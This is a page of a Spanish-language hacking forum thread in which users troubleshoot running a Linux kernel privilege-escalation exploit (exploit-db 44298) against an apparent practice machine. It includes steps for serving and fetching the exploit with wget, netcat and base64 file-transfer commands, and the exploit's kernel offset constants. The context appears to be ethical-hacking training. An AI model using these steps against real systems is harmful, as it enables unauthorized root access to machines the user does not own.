• Inicio
  • Blog
  • Wargames
  • Buscar
  • Ingresar
  • Registrarse

    • Hack x Crack - Comunidad de Seguridad informática »
    • Seguridad Informatica »
    • Hacking »
    • Escalado de privilegios
    El evento Bitup2019 necesita tu ayuda! Click aquí para saber más
    • Imprimir
    Páginas: 1 2 [3]   Ir Abajo

    Autor Tema: Escalado de privilegios  (Leído 8130 veces)

    Desconectado javisanz

    • { L0 } Ñuub
    • Mensajes: 6
      • Ver Perfil
    Re:Escalado de privilegios
    « Respuesta #20 en: Febrero 21, 2019, 05:37:16 pm »
    Muy buenas!

    Perdona el retraso, esta semana estuve algo liado hoy he seguido tu consejo y ¡¡HA FUNCIONADO!!

    Al final compilé el exploit en kali, lo subí a la maquina virtual con wget (a la carpeta /tmp), añadir perdisos chmod 777 y ejecutar BANG!!

    Muchísimas gracias por los consejos y las pistas!!

    En línea

    Desconectado animanegra

    • { L7 } Juanker
    • *******
    • Mensajes: 1283
      • Ver Perfil
    Re:Escalado de privilegios
    « Respuesta #21 en: Febrero 21, 2019, 05:52:16 pm »
    Para eso estamos. A mandar!! :D Happy hacking
    En línea

    Errante

    Desconectado joops

    • { L0 } Ñuub
    • Mensajes: 1
      • Ver Perfil
    Re:Escalado de privilegios
    « Respuesta #22 en: Mayo 27, 2019, 01:18:17 pm »
    Buenas, podrías darme alguna pista de como copiaste el exploit, me he quedado en paso de tener una shell remota.

    Muchas gracia
    En línea

    Desconectado sancand

    • { L0 } Ñuub
    • Mensajes: 3
      • Ver Perfil
    Re:Escalado de privilegios
    « Respuesta #23 en: Mayo 28, 2019, 10:56:02 pm »
    Cita de: javisanz en Febrero 21, 2019, 05:37:16 pm
    Muy buenas!

    Perdona el retraso, esta semana estuve algo liado hoy he seguido tu consejo y ¡¡HA FUNCIONADO!!

    Al final compilé el exploit en kali, lo subí a la maquina virtual con wget (a la carpeta /tmp), añadir perdisos chmod 777 y ejecutar BANG!!

    Muchísimas gracias por los consejos y las pistas!!

    Buenas he llegado a compilar el exploit, https://www.exploit-db.com/download/44298, subido a la máquina objetivo (carpeta /tmp), cambiado permisos...
    pero en el momento de ejecutar me indica Invalid argument. ¿Alguna idea? Soy muy nuevo en el mundo del hacking ético...y poco menos en Linux :-(

    Gracias!
    En línea

    Desconectado sancand

    • { L0 } Ñuub
    • Mensajes: 3
      • Ver Perfil
    Re:Escalado de privilegios
    « Respuesta #24 en: Mayo 28, 2019, 10:59:30 pm »
    Cita de: joops en Mayo 27, 2019, 01:18:17 pm
    Buenas, podrías darme alguna pista de como copiaste el exploit, me he quedado en paso de tener una shell remota.

    Muchas gracia

    Los pasos que he hecho yo... mediante gcc compilar el exploit para generar el ejecutable; desde Kali activar apache y copiar el ejecutable en la ruta /var/www/html
    y desde la shell (alguna carpeta con permisos, p.e. /tmp) wget ip_kali/nombre_ejecutable...pero ahí me he quedado yo :-(
    En línea

    Desconectado animanegra

    • { L7 } Juanker
    • *******
    • Mensajes: 1283
      • Ver Perfil
    Re:Escalado de privilegios
    « Respuesta #25 en: Mayo 29, 2019, 10:12:01 am »
    Cita de: sancand en Mayo 28, 2019, 10:56:02 pm
    en el momento de ejecutar me indica Invalid argument. ¿Alguna idea?

    ¿Has probado a compilar el exploit de forma estática?

    Citar
    Buenas, podrías darme alguna pista de como copiaste el exploit, me he quedado en paso de tener una shell remota.

    Para copiar un archivo de remoto a local tienes muchas opciones, desde un wget como te comentan, un scp si tiene instalado, utilizando netcat y una redireccion (ejecutas en tu equipo: nc -l -p PUERTO < archivo.exe y en el otro: nc TUIP PUERTO > archivo.exe). Puedes tambien abrir una consola ejecutar "cat archivo.exe | base64" y copiar y pegar de la consola para luego en la máquina remota donde tienes  que poner "echo 'TEXTOCOPIADO' | base64 -d". Hay más opciones, pero estas son unas cuantas.
    En línea

    Errante

    Desconectado sancand

    • { L0 } Ñuub
    • Mensajes: 3
      • Ver Perfil
    Re:Escalado de privilegios
    « Respuesta #26 en: Mayo 29, 2019, 11:29:44 am »
    Cita de: animanegra en Mayo 29, 2019, 10:12:01 am
    Cita de: sancand en Mayo 28, 2019, 10:56:02 pm
    en el momento de ejecutar me indica Invalid argument. ¿Alguna idea?

    ¿Has probado a compilar el exploit de forma estática?


    Acabo de probar ahora (poniendo -static cuando ejecuto gcc...entiendo que es esto) y el resultado ha sido el mismo :-(
    Para ejecutar el exploit entiendo que desde la shell que tengo sobre la máquina a la que ataco únicamente tengo que indicar ./nombre_fichero, no? Si es así, me sigue indicando el mismo error; no se si aparte tengo que poner algún parametro

    Gracias!
    En línea

    Desconectado animanegra

    • { L7 } Juanker
    • *******
    • Mensajes: 1283
      • Ver Perfil
    Re:Escalado de privilegios
    « Respuesta #27 en: Mayo 29, 2019, 02:51:54 pm »
    Citar
    únicamente tengo que indicar ./nombre_fichero, no?

    Pues no se, mira la documentación del exploit específico. Pero normalmente un exploit de local privilege escalation te permite estando en el ordenador en una consola ejecutar el comando y que te abra una consola de administrador desde la que ejecutar comandos como superusuario.

    ¿Lo has compilado en el mismo kernel que la máquina objetivo? Mismo procesaor, etc... el exploit ese me suena que era solo para un kernel concreto y para 64 bits.
    En línea

    Errante

    Desconectado marta202

    • { L0 } Ñuub
    • Mensajes: 1
      • Ver Perfil
    Re:Escalado de privilegios
    « Respuesta #28 en: Julio 18, 2019, 08:12:39 pm »
    Hola estoy en la misma situación que los compañeros anteriores. He conseguido una Shell y necesito pasar a root. Llevare como 100h intentandolo y ya estoy desesperado. Efectivamente, la maquina es un Ubuntu 4.4.0-87  16.04.4.

    He probado de todo y no hay manera. También he probado con el exploit 44298 y también me da el mismo problema "Invalid Argument".

    Revisando el código veo lo siguiente:

    // Tested on:
    // 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64
    // if different kernel adjust CRED offset + check kernel stack size

    #define PHYS_OFFSET 0xffff880000000000
    #define CRED_OFFSET 0x5f8
    #define UID_OFFSET 4
    #define LOG_BUF_SIZE 65536
    #define PROGSIZE 328

    Entiendo que como el kernel es 4.4.0-87 debería cambiar esos parametros pero sinceramente, no se ni que son... como podria saber que paramentros corresponden a mi kernel? Probaria algun otro script, pero me estoy quedando sin tiempo y sin ideas.

    Gracias!
    En línea

    Desconectado r3ddit3

    • { L0 } Ñuub
    • Mensajes: 1
      • Ver Perfil
    Re:Escalado de privilegios
    « Respuesta #29 en: Noviembre 24, 2019, 04:31:30 pm »
    Tengo un problema similar al nombrado. Tengo la máquina victima y kali. En kali tengo un apache2 corriendo con el exploit guardado en /var/www/html/ y al tratar de hacer el wget con la maquina victima me aparece read only file system.
    Aclarar que el archivo ya tiene chmod 777 y el wget lo ejecuto desde temp el cual tiene privilegios totales también.

    Alguna idea?
    En línea

    • Imprimir
    Páginas: 1 2 [3]   Ir Arriba
    • Hack x Crack - Comunidad de Seguridad informática »
    • Seguridad Informatica »
    • Hacking »
    • Escalado de privilegios
     

    • SMF | SMF © 2013, Simple Machines
    • XHTML
    • RSS
    • WAP2
    Va un mudo y le dice a un sordo: Hack x Crack usa cookies. Pues eso... Learn more